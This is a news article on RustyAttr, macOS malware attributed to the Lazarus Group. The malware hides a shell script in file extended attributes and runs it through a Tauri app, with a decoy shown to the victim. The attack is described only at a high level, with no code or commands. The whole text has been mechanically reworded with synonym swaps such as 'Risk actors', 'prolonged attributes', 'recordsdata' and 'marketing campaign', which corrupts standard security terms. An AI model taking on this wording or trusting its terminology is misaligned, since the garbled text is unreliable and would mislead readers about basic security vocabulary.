Risk actors have been discovered leveraging a brand new approach that abuses prolonged attributes for macOS recordsdata to smuggle a brand new malware known as RustyAttr.
The Singaporean cybersecurity firm has attributed the novel exercise with reasonable confidence to the notorious North Korea-linked Lazarus Group, citing infrastructure and tactical overlaps noticed in reference to prior campaigns, together with RustBucket.
Prolonged attributes discuss with extra metadata related to recordsdata and directories that may be extracted utilizing a devoted command known as xattr. They’re usually used to retailer data that goes past the usual attributes, comparable to file measurement, timestamps, and permissions.
The malicious functions found by Group-IB are constructed utilizing Tauri, a cross-platform desktop utility framework, and signed with a leaked certificates that has since been revoked by Apple. They embody an prolonged attribute that is configured to fetch and run a shell script.
The execution of the shell script additionally triggers a decoy, which serves as a distraction mechanism by both displaying an error message “This app does not support this version” or a seemingly innocent PDF doc associated to the event and funding of gaming tasks.
“Upon executing the application, the Tauri application attempts to render a HTML webpage using a WebView,” Group-IB safety researcher Sharmine Low mentioned. “The [threat actor] used some random template pulled off the internet.”
However what’s additionally notable is that these net pages are engineered to load a malicious JavaScript, which then obtains the content material of the prolonged attributes and executes it by the use of a Rust backend. That mentioned, the faux net web page is ultimately displayed solely in circumstances the place there are not any prolonged attributes.
The tip aim of the marketing campaign stays unclear, particularly in gentle of the truth that there was no proof of any additional payloads or confirmed victims.
“Fortunately, macOS systems provide some level of protection for the found samples,” Low mentioned. “To trigger the attack, users must disable Gatekeeper by overriding malware protection. It is likely that some degree of interaction and social engineering will be necessary to convince victims to take these steps.”
The event comes as North Korean risk actors have been partaking in intensive campaigns that goal to safe distant positions with companies internationally, in addition to trick present workers working at cryptocurrency corporations into downloading malware below the pretext of coding interviews.
